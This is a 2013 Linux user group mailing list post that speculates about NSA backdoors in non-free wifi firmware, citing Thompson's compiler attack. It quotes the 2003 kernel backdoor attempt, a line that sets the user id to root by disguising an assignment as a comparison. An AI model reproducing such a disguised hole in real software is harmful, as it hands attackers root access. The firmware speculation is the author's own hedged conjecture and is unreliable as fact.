[SATLUG] NSA/IP stack in non-free wifi drivers?

Joe null.div.zero at gmail.com
Tue Aug 13 22:28:37 CDT 2013


Hi All,
     So, I may be cracking up here; but, I'm curious to see your responses
to this.  I've been reading the Snowden stuff in the news. Apparently
there's some renewed discussion out there about proprietary software
containing handy back doors for the NSA to snoop on people.  A coworker
suggested there would be a surge of linux adopters in the wake of those
suggestions.  But, then I started to research the Linux code, and found:
The Linux source code is around 15 million lines of code
http://en.wikipedia.org/wiki/Linux_kernel#History
Searching for "malicious code in Linux source"  yields a breach in 2011 and
this from 2003
https://freedom-to-tinker.com/blog/felten/linux-backdoor-attempt-thwarted/
which included this malicious line
if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;
notice the `=` used instead of an "==" .
That error was caught.  And, i'm quite certain the Linux maintainers keep a
close eye on the source code.  So, where else can you get nefarious code
into the running Linux Kernel?  Ken Thompson suggested one could modify the
source code of a compiler in such a way that the resulting modified
compiler would insert a secret "universal" password into any code that
called the linux logon library:  http://cm.bell-labs.com/who/ken/trust.html.
 Some commentators on this issue suggest compiling the compiler code twice
(each time by the newest compiler;  sort like recursion)  then doing a hash
check, successfully proves safety.  I'm not sure i agree; seems like a
simple if statement would prevent the re-insertion of the code in question.
 A scary thought; but, still my feeling is that malicious code would
ultimately get lost by attrition.  And, even it weren't, file encryption,
firewalls, and network monitoring software would stop or expose the issue.
Then tonight i went installing debian on an old dell.  I was prompted that
a non-free firmware was required for my wireless device. ...  Come to think
of 9 out 10 laptops require some non-free/closed source code for their
wireless hardware.   Is it a coincidence that the most used network device
on the most popular end user systems are only usable via closed source
code?  Furthermore, the compiled size of the TCP/IP stack can be as little
as 512kb; my firmware tonight was 14MB!  Is it possible that backdoors are
hiding in plain sight, with 99% of end users willingly (and sometimes
painstakingly) building that backdoor into their own kernels?  And, if,
indeed, a nonstandard networking stack were used on top of the existing
datalink layer, whether in series or parallel, would likely go unnoticed.
So, what do you think?  Am I loosing it?


More information about the SATLUG mailing list